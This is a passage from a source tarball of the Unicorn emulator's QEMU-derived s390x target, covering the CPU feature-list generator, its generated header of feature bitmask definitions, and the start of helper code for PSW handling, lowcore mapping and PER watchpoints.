CPU_FEAT_INITIALIZER(GEN12_GA2), CPU_FEAT_INITIALIZER(GEN13_GA1), CPU_FEAT_INITIALIZER(GEN13_GA2), CPU_FEAT_INITIALIZER(GEN14_GA1), CPU_FEAT_INITIALIZER(GEN14_GA2), CPU_FEAT_INITIALIZER(GEN15_GA1), }; #define FEAT_GROUP_INITIALIZER(_name) \ { \ .name = "S390_FEAT_GROUP_LIST_" #_name, \ .enum_name = "S390_FEAT_GROUP_" #_name, \ .bits = \ { .data = group_##_name, \ .len = ARRAY_SIZE(group_##_name) }, \ } typedef struct { const char *name; const char *enum_name; BitSpec bits; } FeatGroupDefSpec; /******************************* * feature groups *******************************/ static FeatGroupDefSpec FeatGroupDef[] = { FEAT_GROUP_INITIALIZER(PLO), FEAT_GROUP_INITIALIZER(TOD_CLOCK_STEERING), FEAT_GROUP_INITIALIZER(GEN13_PTFF), FEAT_GROUP_INITIALIZER(MSA), FEAT_GROUP_INITIALIZER(MSA_EXT_1), FEAT_GROUP_INITIALIZER(MSA_EXT_2), FEAT_GROUP_INITIALIZER(MSA_EXT_3), FEAT_GROUP_INITIALIZER(MSA_EXT_4), FEAT_GROUP_INITIALIZER(MSA_EXT_5), FEAT_GROUP_INITIALIZER(MSA_EXT_6), FEAT_GROUP_INITIALIZER(MSA_EXT_7), FEAT_GROUP_INITIALIZER(MSA_EXT_8), FEAT_GROUP_INITIALIZER(MSA_EXT_9), FEAT_GROUP_INITIALIZER(MSA_EXT_9_PCKMO), FEAT_GROUP_INITIALIZER(MULTIPLE_EPOCH_PTFF), FEAT_GROUP_INITIALIZER(ENH_SORT), FEAT_GROUP_INITIALIZER(DEFLATE_CONVERSION), }; #define QEMU_FEAT_INITIALIZER(_name) \ { \ .name = "S390_FEAT_LIST_QEMU_" #_name, \ .bits = \ { .data = qemu_##_name, \ .len = ARRAY_SIZE(qemu_##_name) }, \ } /******************************* * QEMU (CPU model) features *******************************/ static FeatGroupDefSpec QemuFeatDef[] = { QEMU_FEAT_INITIALIZER(V2_11), QEMU_FEAT_INITIALIZER(V3_1), QEMU_FEAT_INITIALIZER(V4_0), QEMU_FEAT_INITIALIZER(V4_1), QEMU_FEAT_INITIALIZER(LATEST), QEMU_FEAT_INITIALIZER(MAX), }; static void set_bits(uint64_t list[], BitSpec bits) { uint32_t i; for (i = 0; i < bits.len; i++) { list[bits.data[i] / 64] |= 1ULL << (bits.data[i] % 64); } } static inline void clear_bit(uint64_t list[], unsigned long nr) { list[nr / 64] &= ~(1ULL << (nr % 64)); } static void print_feature_defs(void) { uint64_t base_feat[S390_FEAT_MAX / 64 + 1] = {}; uint64_t default_feat[S390_FEAT_MAX / 64 + 1] = {}; uint64_t full_feat[S390_FEAT_MAX / 64 + 1] = {}; int i, j; printf("\n/* CPU model feature list data */\n"); for (i = 0; i < ARRAY_SIZE(CpuFeatDef); i++) { /* With gen15 CSSKE and BPB are deprecated */ if (strcmp(CpuFeatDef[i].name, "S390_FEAT_LIST_GEN15_GA1") == 0) { clear_bit(base_feat, S390_FEAT_CONDITIONAL_SSKE); clear_bit(default_feat, S390_FEAT_CONDITIONAL_SSKE); clear_bit(default_feat, S390_FEAT_BPB); } set_bits(base_feat, CpuFeatDef[i].base_bits); /* add the base to the default features */ set_bits(default_feat, CpuFeatDef[i].base_bits); set_bits(default_feat, CpuFeatDef[i].default_bits); /* add the base to the full features */ set_bits(full_feat, CpuFeatDef[i].base_bits); set_bits(full_feat, CpuFeatDef[i].full_bits); printf("#define %s_BASE\t", CpuFeatDef[i].name); for (j = 0; j < ARRAY_SIZE(base_feat); j++) { printf("0x%016"PRIx64"ULL", base_feat[j]); if (j < ARRAY_SIZE(base_feat) - 1) { printf(","); } else { printf("\n"); } } printf("#define %s_DEFAULT\t", CpuFeatDef[i].name); for (j = 0; j < ARRAY_SIZE(default_feat); j++) { printf("0x%016"PRIx64"ULL", default_feat[j]); if (j < ARRAY_SIZE(default_feat) - 1) { printf(","); } else { printf("\n"); } } printf("#define %s_FULL\t\t", CpuFeatDef[i].name); for (j = 0; j < ARRAY_SIZE(full_feat); j++) { printf("0x%016"PRIx64"ULL", full_feat[j]); if (j < ARRAY_SIZE(full_feat) - 1) { printf(","); } else { printf("\n"); } } } } static void print_qemu_feature_defs(void) { uint64_t feat[S390_FEAT_MAX / 64 + 1] = {}; int i, j; printf("\n/* QEMU (CPU model) feature list data */\n"); /* for now we assume that we only add new features */ for (i = 0; i < ARRAY_SIZE(QemuFeatDef); i++) { set_bits(feat, QemuFeatDef[i].bits); printf("#define %s\t", QemuFeatDef[i].name); for (j = 0; j < ARRAY_SIZE(feat); j++) { printf("0x%016"PRIx64"ULL", feat[j]); if (j < ARRAY_SIZE(feat) - 1) { printf(","); } else { printf("\n"); } } } } static void print_feature_group_defs(void) { int i, j; printf("\n/* CPU feature group list data */\n"); for (i = 0; i < ARRAY_SIZE(FeatGroupDef); i++) { uint64_t feat[S390_FEAT_MAX / 64 + 1] = {}; set_bits(feat, FeatGroupDef[i].bits); printf("#define %s\t", FeatGroupDef[i].name); for (j = 0; j < ARRAY_SIZE(feat); j++) { printf("0x%016"PRIx64"ULL", feat[j]); if (j < ARRAY_SIZE(feat) - 1) { printf(","); } else { printf("\n"); } } } } static void print_feature_group_enum_type(void) { int i; printf("\n/* CPU feature group enum type */\n" "typedef enum {\n"); for (i = 0; i < ARRAY_SIZE(FeatGroupDef); i++) { printf("\t%s,\n", FeatGroupDef[i].enum_name); } printf("\tS390_FEAT_GROUP_MAX,\n" "} S390FeatGroup;\n"); } int main(int argc, char *argv[]) { printf("/*\n" " * AUTOMATICALLY GENERATED, DO NOT MODIFY HERE, EDIT\n" " * SOURCE FILE \"%s\" INSTEAD.\n" " *\n" " * Copyright %s IBM Corp.\n" " *\n" " * This work is licensed under the terms of the GNU GPL, " "version 2 or (at\n * your option) any later version. See " "the COPYING file in the top-level\n * directory.\n" " */\n\n" "#ifndef %s\n#define %s\n", __FILE__, _YEARS, _NAME_H, _NAME_H); print_feature_defs(); print_feature_group_defs(); print_qemu_feature_defs(); print_feature_group_enum_type(); printf("\n#endif\n"); return 0; } �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/gen-features.h������������������������������������������������������0000664�0000000�0000000�00000034731�14675241067�0021075�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * AUTOMATICALLY GENERATED, DO NOT MODIFY HERE, EDIT * SOURCE FILE "/home/me/projects/qemu/qemu-5.0.1/target/s390x/gen-features.c" INSTEAD. * * Copyright 2016 IBM Corp. * * This work is licensed under the terms of the GNU GPL, version 2 or (at * your option) any later version. See the COPYING file in the top-level * directory. */ #ifndef TARGET_S390X_GEN_FEATURES_H #define TARGET_S390X_GEN_FEATURES_H /* CPU model feature list data */ #define S390_FEAT_LIST_GEN7_GA1_BASE 0x0000000000000003ULL,0xfffffe0000000000ULL,0x0000000000000001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN7_GA1_DEFAULT 0x0000000000000003ULL,0xfffffe0000000000ULL,0x0000000000000001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN7_GA1_FULL 0x0000000000000003ULL,0xfffffe3380000030ULL,0x0000000000000001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN7_GA2_BASE 0x0000000000000003ULL,0xfffffe0000000000ULL,0x0000000000000001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN7_GA2_DEFAULT 0x0000000000000003ULL,0xfffffe0000000000ULL,0x0000000000000001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN7_GA2_FULL 0x0000000000008003ULL,0xfffffe3380000030ULL,0x0000000000000001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN7_GA3_BASE 0x0000000000000003ULL,0xfffffe0000000000ULL,0x0000000000000001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN7_GA3_DEFAULT 0x0000000000000003ULL,0xfffffe0000000000ULL,0x0000000000000001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN7_GA3_FULL 0x0000000000028003ULL,0xfffffe3780000030ULL,0x0000000000000001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN8_GA1_BASE 0x00000000000f8007ULL,0xfffffe0000000000ULL,0x802000e007007001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN8_GA1_DEFAULT 0x00000000000f8007ULL,0xfffffe0000000000ULL,0x802000e007007001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN8_GA1_FULL 0x00000000000f8007ULL,0xfffffe3788800030ULL,0x802000e007007001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN8_GA2_BASE 0x00000000000f8007ULL,0xfffffe0000000000ULL,0x802000e007007001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN8_GA2_DEFAULT 0x00000000000f8007ULL,0xfffffe0000000000ULL,0x802000e007007001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN8_GA2_FULL 0x00000000000f8007ULL,0xfffffe3788800030ULL,0x802000e007007001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN8_GA3_BASE 0x00000000000f8007ULL,0xfffffe0000000000ULL,0x802000e007007001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN8_GA3_DEFAULT 0x00000000000f8007ULL,0xfffffe0000000000ULL,0x802000e007007001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN8_GA3_FULL 0x00000000002f8027ULL,0xfffffe3788800030ULL,0x802000e007007001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN8_GA4_BASE 0x00000000000f8007ULL,0xfffffe0000000000ULL,0x802000e007007001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN8_GA4_DEFAULT 0x00000000000f8007ULL,0xfffffe0000000000ULL,0x802000e007007001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN8_GA4_FULL 0x00000000002f8027ULL,0xfffffe3788800030ULL,0x802000e007007001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN8_GA5_BASE 0x00000000000f8007ULL,0xfffffe0000000000ULL,0x802000e007007001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN8_GA5_DEFAULT 0x00000000000f8007ULL,0xfffffe0000000000ULL,0x802000e007007001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN8_GA5_FULL 0x00000000002f8027ULL,0xfffffe3788800030ULL,0x802000e007007001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN9_GA1_BASE 0x0000000019ff816fULL,0xfffffe4000000000ULL,0x802000e00700710fULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN9_GA1_DEFAULT 0x4000000019ff816fULL,0xfffffec000000000ULL,0x806008e04700710fULL,0x0000000000000001ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN9_GA1_FULL 0x4000000019ff816fULL,0xfffffef798800030ULL,0x806008e04700710fULL,0x0000000000000001ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN9_GA2_BASE 0x0000000019ff816fULL,0xfffffe4000000000ULL,0x802000e00700710fULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN9_GA2_DEFAULT 0x4000000019ff816fULL,0xfffffec000000000ULL,0x806008e04700710fULL,0x0000000000000001ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN9_GA2_FULL 0x400000c07dff816fULL,0xfffffef798800030ULL,0x806008e04700710fULL,0x0000000000000001ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN9_GA3_BASE 0x0000000019ff816fULL,0xfffffe4000000000ULL,0x802000e00700710fULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN9_GA3_DEFAULT 0x4000000019ff816fULL,0xfffffec000000000ULL,0x806008e04700710fULL,0x0000000000000001ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN9_GA3_FULL 0x400002c07dff836fULL,0xfffffef798800030ULL,0x806008e04700710fULL,0x0000000000000001ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN10_GA1_BASE 0x000003c3ffff836fULL,0xfffffe4000000000ULL,0x802000e00700710fULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN10_GA1_DEFAULT 0x400003c3ffff83efULL,0xfffffec000000000ULL,0x80e038f1c700710fULL,0x0000000000000003ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN10_GA1_FULL 0x400003c3ffff87efULL,0xfffffeffb9800030ULL,0x80e038f1c700710fULL,0x0000000000000003ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN10_GA2_BASE 0x000003c3ffff836fULL,0xfffffe4000000000ULL,0x802000e00700710fULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN10_GA2_DEFAULT 0x400003c3ffff83efULL,0xfffffec000000000ULL,0x80e038f1c700710fULL,0x0000000000000003ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN10_GA2_FULL 0x400003e3ffff87efULL,0xfffffefff9800030ULL,0x80e038f1c700710fULL,0x0000000000000003ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN10_GA3_BASE 0x000003c3ffff836fULL,0xfffffe4000000000ULL,0x802000e00700710fULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN10_GA3_DEFAULT 0x400003c3ffff83efULL,0xfffffec000000000ULL,0x80e038f1c700710fULL,0x0000000000000003ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN10_GA3_FULL 0x400003e3ffff87efULL,0xfffffefff9800031ULL,0x80e1ffffff03f10fULL,0x0000000000003f03ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN11_GA1_BASE 0x00010fefffffa36fULL,0xfffffe4000000000ULL,0x802000e00700710fULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN11_GA1_DEFAULT 0xc0010fefffffb3efULL,0xfffffec000000033ULL,0xc0fffffffffff10fULL,0xfffffffffff83f03ULL,0x000000000000007fULL #define S390_FEAT_LIST_GEN11_GA1_FULL 0xc0010fefffffb7efULL,0xfffffefff9800033ULL,0xc0fffffffffff10fULL,0xfffffffffff83f03ULL,0x000000000000007fULL #define S390_FEAT_LIST_GEN11_GA2_BASE 0x00010fefffffa36fULL,0xfffffe4000000000ULL,0x802000e00700710fULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN11_GA2_DEFAULT 0xc0010fefffffb3efULL,0xfffffec000000033ULL,0xc0fffffffffff10fULL,0xfffffffffff83f03ULL,0x000000000000007fULL #define S390_FEAT_LIST_GEN11_GA2_FULL 0xc0010fefffffb7efULL,0xfffffefff9800033ULL,0xc0fffffffffff10fULL,0xfffffffffff83f03ULL,0x000000000000007fULL #define S390_FEAT_LIST_GEN12_GA1_BASE 0x0001bfefffffa36fULL,0xfffffe4000000000ULL,0x802000e00700710fULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN12_GA1_DEFAULT 0xed01ffefffffb3efULL,0xfffffec001000137ULL,0xc0fffffffffff10fULL,0xfffffffffff83f03ULL,0x000000000000007fULL #define S390_FEAT_LIST_GEN12_GA1_FULL 0xff01ffefffffffefULL,0xfffffffff9800137ULL,0xc0fffffffffff10fULL,0xfffffffffff83f03ULL,0x000000000000007fULL #define S390_FEAT_LIST_GEN12_GA2_BASE 0x0001bfefffffa36fULL,0xfffffe4000000000ULL,0x802000e00700710fULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN12_GA2_DEFAULT 0xed01ffefffffb3efULL,0xfffffec001000137ULL,0xc0fffffffffff10fULL,0xfffffffffff83f03ULL,0x000000000000007fULL #define S390_FEAT_LIST_GEN12_GA2_FULL 0xff09ffefffffffefULL,0xfffffffff9800137ULL,0xc0fffffffffff10fULL,0xfffffffffff83f03ULL,0x000000000000407fULL #define S390_FEAT_LIST_GEN13_GA1_BASE 0x0003bfefffffa36fULL,0xfffffe4000000008ULL,0x802000e00700733fULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN13_GA1_DEFAULT 0xed0bffefffffb3efULL,0xfffffec00100017fULL,0xc0fffffffffff33fULL,0xfffffffffff83f03ULL,0x000000000000407fULL #define S390_FEAT_LIST_GEN13_GA1_FULL 0xff0bffefffffffefULL,0xfffffffff980017fULL,0xc0fffffffffff33fULL,0xfffffffffff83f03ULL,0x000000000000407fULL #define S390_FEAT_LIST_GEN13_GA2_BASE 0x0003bfefffffa36fULL,0xfffffe4000000008ULL,0x802000e00700733fULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN13_GA2_DEFAULT 0xed0bffefffffb3efULL,0xfffffec00100017fULL,0xc0fffffffffff33fULL,0xfffffffffff83f03ULL,0x000000000000407fULL #define S390_FEAT_LIST_GEN13_GA2_FULL 0xff0bffefffffffefULL,0xfffffffff980017fULL,0xc0fffffffffff33fULL,0xfffffffffff83f03ULL,0x000000000000407fULL #define S390_FEAT_LIST_GEN14_GA1_BASE 0x0077bfffffffa36fULL,0xfffffe4000000008ULL,0x802000e00700733fULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN14_GA1_DEFAULT 0xed7fffffffffb3efULL,0xfffffec001009fffULL,0xffffffffffffffffULL,0xfffffffffff83fffULL,0x00000000007fc07fULL #define S390_FEAT_LIST_GEN14_GA1_FULL 0xff7fffffffffffefULL,0xffffffffffc1ffffULL,0xffffffffffffffffULL,0xfffffffffff83fffULL,0x00000000007fc07fULL #define S390_FEAT_LIST_GEN14_GA2_BASE 0x0077bfffffffa36fULL,0xfffffe4000000008ULL,0x802000e00700733fULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN14_GA2_DEFAULT 0xed7fffffffffb3efULL,0xfffffec001009fffULL,0xffffffffffffffffULL,0xfffffffffff83fffULL,0x00000000007fc07fULL #define S390_FEAT_LIST_GEN14_GA2_FULL 0xff7fffffffffffefULL,0xffffffffffc1ffffULL,0xffffffffffffffffULL,0xfffffffffff83fffULL,0x00000000007fc07fULL #define S390_FEAT_LIST_GEN15_GA1_BASE 0x00f7bfffffffa16fULL,0xfffffe4000000008ULL,0x802000e00700733fULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN15_GA1_DEFAULT 0xedffffffffffb1efULL,0xfffffec0017a9fdfULL,0xffffffffffffffffULL,0xffffffffffffffffULL,0x0000783fffffffffULL #define S390_FEAT_LIST_GEN15_GA1_FULL 0xffffffffffffffefULL,0xffffffffffffffffULL,0xffffffffffffffffULL,0xffffffffffffffffULL,0x00007fffffffffffULL /* CPU feature group list data */ #define S390_FEAT_GROUP_LIST_PLO 0x0000000000000000ULL,0xfffffe0000000000ULL,0x0000000000000001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_GROUP_LIST_TOD_CLOCK_STEERING 0x0000000008000000ULL,0x0000000000000000ULL,0x000000000000010eULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_GROUP_LIST_GEN13_PTFF 0x0000000000000000ULL,0x0000000000000000ULL,0x0000000000000230ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_GROUP_LIST_MSA 0x0000000000010000ULL,0x0000000000000000ULL,0x802000e007007000ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_GROUP_LIST_MSA_EXT_1 0x0000000000000000ULL,0x0000000000000000ULL,0x0040080040000000ULL,0x0000000000000001ULL,0x0000000000000000ULL #define S390_FEAT_GROUP_LIST_MSA_EXT_2 0x0000000000000000ULL,0x0000000000000000ULL,0x0080301180000000ULL,0x0000000000000002ULL,0x0000000000000000ULL #define S390_FEAT_GROUP_LIST_MSA_EXT_3 0x0000000000000000ULL,0x0000000000000001ULL,0x0001c70e38038000ULL,0x0000000000003f00ULL,0x0000000000000000ULL #define S390_FEAT_GROUP_LIST_MSA_EXT_4 0x0000000000000000ULL,0x0000000000000002ULL,0x401e000000fc0000ULL,0xfffffffffff80000ULL,0x000000000000007fULL #define S390_FEAT_GROUP_LIST_MSA_EXT_5 0x0008000000000000ULL,0x0000000000000000ULL,0x0000000000000000ULL,0x0000000000000000ULL,0x0000000000004000ULL #define S390_FEAT_GROUP_LIST_MSA_EXT_6 0x0000000000000000ULL,0x0000000000000000ULL,0x3f00000000000000ULL,0x00000000000000fcULL,0x0000000000000000ULL #define S390_FEAT_GROUP_LIST_MSA_EXT_7 0x0000000000000000ULL,0x0000000000000000ULL,0x0000000000000000ULL,0x0000000000000000ULL,0x0000000000018000ULL #define S390_FEAT_GROUP_LIST_MSA_EXT_8 0x0000000000000000ULL,0x0000000000008000ULL,0x0000000000000000ULL,0x0000000000000000ULL,0x00000000007e0000ULL #define S390_FEAT_GROUP_LIST_MSA_EXT_9 0x0000000000000000ULL,0x0000000000200000ULL,0x0000000000000000ULL,0x0000000000000000ULL,0x0000003fff803f80ULL #define S390_FEAT_GROUP_LIST_MSA_EXT_9_PCKMO 0x0000000000000000ULL,0x0000000000000000ULL,0x0000000000000000ULL,0x000000000007c000ULL,0x0000000000000000ULL #define S390_FEAT_GROUP_LIST_MULTIPLE_EPOCH_PTFF 0x0000000000000000ULL,0x0000000000000000ULL,0x0000000000000cc0ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_GROUP_LIST_ENH_SORT 0x0000000000000000ULL,0x0000000000040000ULL,0x0000000000000000ULL,0x0000000000000000ULL,0x000007c000000000ULL #define S390_FEAT_GROUP_LIST_DEFLATE_CONVERSION 0x0000000000000000ULL,0x0000000000080000ULL,0x0000000000000000ULL,0x0000000000000000ULL,0x0000780000000000ULL /* QEMU (CPU model) feature list data */ #define S390_FEAT_LIST_QEMU_V2_11 0x0000000000000003ULL,0xfffffe0000000000ULL,0x0000000000000001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_QEMU_V3_1 0x1801a463f5b7814fULL,0xfffffe0000000003ULL,0x0000000000000001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_QEMU_V4_0 0x1c01a46bf5b7814fULL,0xfffffe0000000003ULL,0x0000000000000001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_QEMU_V4_1 0x1c03a46bf5b7814fULL,0xfffffe0000000043ULL,0x0000000000000001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_QEMU_LATEST 0x9c03a46bf5b7814fULL,0xfffffe0001000143ULL,0x0000000000000001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_QEMU_MAX 0x9c0ba46bf5b7814fULL,0xfffffe00010001c3ULL,0x0000000000000001ULL,0x0000000000000000ULL,0x0000000000000000ULL /* CPU feature group enum type */ typedef enum { S390_FEAT_GROUP_PLO, S390_FEAT_GROUP_TOD_CLOCK_STEERING, S390_FEAT_GROUP_GEN13_PTFF, S390_FEAT_GROUP_MSA, S390_FEAT_GROUP_MSA_EXT_1, S390_FEAT_GROUP_MSA_EXT_2, S390_FEAT_GROUP_MSA_EXT_3, S390_FEAT_GROUP_MSA_EXT_4, S390_FEAT_GROUP_MSA_EXT_5, S390_FEAT_GROUP_MSA_EXT_6, S390_FEAT_GROUP_MSA_EXT_7, S390_FEAT_GROUP_MSA_EXT_8, S390_FEAT_GROUP_MSA_EXT_9, S390_FEAT_GROUP_MSA_EXT_9_PCKMO, S390_FEAT_GROUP_MULTIPLE_EPOCH_PTFF, S390_FEAT_GROUP_ENH_SORT, S390_FEAT_GROUP_DEFLATE_CONVERSION, S390_FEAT_GROUP_MAX, } S390FeatGroup; #endif ���������������������������������������unicorn-2.1.1/qemu/target/s390x/helper.c������������������������������������������������������������0000664�0000000�0000000�00000025562�14675241067�0017764�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * S/390 helpers * * Copyright (c) 2009 Ulrich Hecht * Copyright (c) 2011 Alexander Graf * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "internal.h" #include "qemu/timer.h" #include "hw/s390x/ioinst.h" #include "sysemu/tcg.h" void s390x_tod_timer(void *opaque) { cpu_inject_clock_comparator((S390CPU *) opaque); } void s390x_cpu_timer(void *opaque) { cpu_inject_cpu_timer((S390CPU *) opaque); } hwaddr s390_cpu_get_phys_page_debug(CPUState *cs, vaddr vaddr) { S390CPU *cpu = S390_CPU(cs); CPUS390XState *env = &cpu->env; target_ulong raddr; int prot; uint64_t asc = env->psw.mask & PSW_MASK_ASC; uint64_t tec; /* 31-Bit mode */ if (!(env->psw.mask & PSW_MASK_64)) { vaddr &= 0x7fffffff; } /* We want to read the code (e.g., see what we are single-stepping).*/ if (asc != PSW_ASC_HOME) { asc = PSW_ASC_PRIMARY; } /* * We want to read code even if IEP is active. Use MMU_DATA_LOAD instead * of MMU_INST_FETCH. */ if (mmu_translate(env, vaddr, MMU_DATA_LOAD, asc, &raddr, &prot, &tec)) { return -1; } return raddr; } hwaddr s390_cpu_get_phys_addr_debug(CPUState *cs, vaddr vaddr) { hwaddr phys_addr; target_ulong page; page = vaddr & TARGET_PAGE_MASK; phys_addr = cpu_get_phys_page_debug(cs, page); phys_addr += (vaddr & ~TARGET_PAGE_MASK); return phys_addr; } static inline bool is_special_wait_psw(uint64_t psw_addr) { /* signal quiesce */ return (psw_addr & 0xfffUL) == 0xfffUL; } void s390_handle_wait(S390CPU *cpu) { #if 0 CPUState *cs = CPU(cpu); if (s390_cpu_halt(cpu) == 0) { if (is_special_wait_psw(cpu->env.psw.addr)) { // qemu_system_shutdown_request(SHUTDOWN_CAUSE_GUEST_SHUTDOWN); } else { cpu->env.crash_reason = S390_CRASH_REASON_DISABLED_WAIT; qemu_system_guest_panicked(cpu_get_crash_info(cs)); } } #endif } void load_psw(CPUS390XState *env, uint64_t mask, uint64_t addr) { uint64_t old_mask = env->psw.mask; env->psw.addr = addr; env->psw.mask = mask; env->cc_op = (mask >> 44) & 3; if ((old_mask ^ mask) & PSW_MASK_PER) { s390_cpu_recompute_watchpoints(env_cpu(env)); } if (mask & PSW_MASK_WAIT) { s390_handle_wait(env_archcpu(env)); } } uint64_t get_psw_mask(CPUS390XState *env) { uint64_t r = env->psw.mask; env->cc_op = calc_cc(env, env->cc_op, env->cc_src, env->cc_dst, env->cc_vr); r &= ~PSW_MASK_CC; assert(!(env->cc_op & ~3)); r |= (uint64_t)env->cc_op << 44; return r; } LowCore *cpu_map_lowcore(CPUS390XState *env) { LowCore *lowcore; hwaddr len = sizeof(LowCore); lowcore = cpu_physical_memory_map(env_cpu(env)->as, env->psa, &len, true); if (len < sizeof(LowCore)) { cpu_abort(env_cpu(env), "Could not map lowcore\n"); } return lowcore; } void cpu_unmap_lowcore(CPUS390XState *env, LowCore *lowcore) { cpu_physical_memory_unmap(env_cpu(env)->as, lowcore, sizeof(LowCore), 1, sizeof(LowCore)); } void do_restart_interrupt(CPUS390XState *env) { uint64_t mask, addr; LowCore *lowcore; lowcore = cpu_map_lowcore(env); lowcore->restart_old_psw.mask = cpu_to_be64(get_psw_mask(env)); lowcore->restart_old_psw.addr = cpu_to_be64(env->psw.addr); mask = be64_to_cpu(lowcore->restart_new_psw.mask); addr = be64_to_cpu(lowcore->restart_new_psw.addr); cpu_unmap_lowcore(env, lowcore); env->pending_int &= ~INTERRUPT_RESTART; load_psw(env, mask, addr); } void s390_cpu_recompute_watchpoints(CPUState *cs) { const int wp_flags = BP_CPU | BP_MEM_WRITE | BP_STOP_BEFORE_ACCESS; S390CPU *cpu = S390_CPU(cs); CPUS390XState *env = &cpu->env; /* We are called when the watchpoints have changed. First remove them all. */ cpu_watchpoint_remove_all(cs, BP_CPU); /* Return if PER is not enabled */ if (!(env->psw.mask & PSW_MASK_PER)) { return; } /* Return if storage-alteration event is not enabled. */ if (!(env->cregs[9] & PER_CR9_EVENT_STORE)) { return; } if (env->cregs[10] == 0 && env->cregs[11] == -1LL) { /* We can't create a watchoint spanning the whole memory range, so split it in two parts. */ cpu_watchpoint_insert(cs, 0, 1ULL << 63, wp_flags, NULL); cpu_watchpoint_insert(cs, 1ULL << 63, 1ULL << 63, wp_flags, NULL); } else if (env->cregs[10] > env->cregs[11]) { /* The address range loops, create two watchpoints. */ cpu_watchpoint_insert(cs, env->cregs[10], -env->cregs[10], wp_flags, NULL); cpu_watchpoint_insert(cs, 0, 